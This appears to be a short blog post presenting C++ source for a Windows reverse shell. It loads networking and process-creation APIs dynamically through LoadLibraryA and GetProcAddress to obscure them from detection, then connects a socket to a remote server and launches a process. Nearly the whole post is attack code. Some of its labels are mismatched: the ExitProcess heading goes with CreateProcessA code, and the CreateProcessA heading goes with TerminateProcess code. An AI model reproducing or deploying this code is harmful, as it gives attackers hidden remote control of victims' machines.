C++ Reverse Shell attempting obfuscation while dynamically loading API.
C++ Reverse Shell Attempting Obfuscation While Dynamically Loading Windows API
- LoadLibraryA
- GetProcAddress
- WSAStartup
- WSASocketA
- WSAConnectA
- CreateProcessA
- ExitProcess
Loading Windows API Dynamically:
How to Read the Following Paragraph
LoadLibraryA Becomes loader
using loader = HMODULE(__stdcall*)(LPCSTR);
loader loader_a = reinterpret_cast<loader>((FARPROC)GetProcAddress(LoadLibraryA(x), "LoadLibraryA"));
getter getter_a = reinterpret_cast<getter>((FARPROC)GetProcAddress(loader_a(x), "GetProcAddress"));
GetProcAddress Becomes getter
using getter = FARPROC(__stdcall*)(HMODULE, LPCSTR);
getter getter_a = reinterpret_cast<getter>((FARPROC)GetProcAddress(loader_a(x), "GetProcAddress"));
wsa_1 wsa_a = reinterpret_cast<wsa_1>((FARPROC)getter_a(loader_a(y), "WSAStartup"));
WSAStartup Becomes wsa_1
using wsa_1 = int(__stdcall*)(WORD, LPWSADATA);
wsa_1 wsa_a = reinterpret_cast<wsa_1>((FARPROC)getter_a(loader_a(y), "WSAStartup"));
wsa_a(a, &b);
WSASocketA Becomes wsa_2
using wsa_2 = SOCKET (__stdcall*)(int, int, int, LPWSAPROTOCOL_INFOA, DWORD, DWORD);
wsa_2 wsa_b = reinterpret_cast<wsa_2>((FARPROC)getter_a(loader_a(y), "WSASocketA"));
SOCKET s = wsa_b(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
WSAConnectA Becomes wsa_3
using wsa_3 = int(__stdcall*)(SOCKET, const sockaddr*, int, LPWSABUF, LPWSABUF, int, int);
wsa_3 wsa_c = reinterpret_cast<wsa_3>((FARPROC)getter_a(loader_a(y), "WSAConnectA"));
wsa_c(s, (sockaddr *)&server, sizeof(server), nullptr, nullptr, NULL, NULL);
ExitProcess Becomes cp
using cp = bool(__stdcall*)(LPCSTR, LPSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCSTR, LPSTARTUPINFOA, LPPROCESS_INFORMATION);
cp cp_a = reinterpret_cast<cp>((FARPROC)getter_a(loader_a(y), "CreateProcessA"));
cp_a(NULL, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &startupInfo, &processInfo);
CreateProcessA Becomes ep
using ep = void(__stdcall*)(UINT);
ep ep_a = reinterpret_cast<ep>((FARPROC)getter_a(loader_a(x), "TerminateProcess"));
ep_a(0);
Commenti
Posta un commento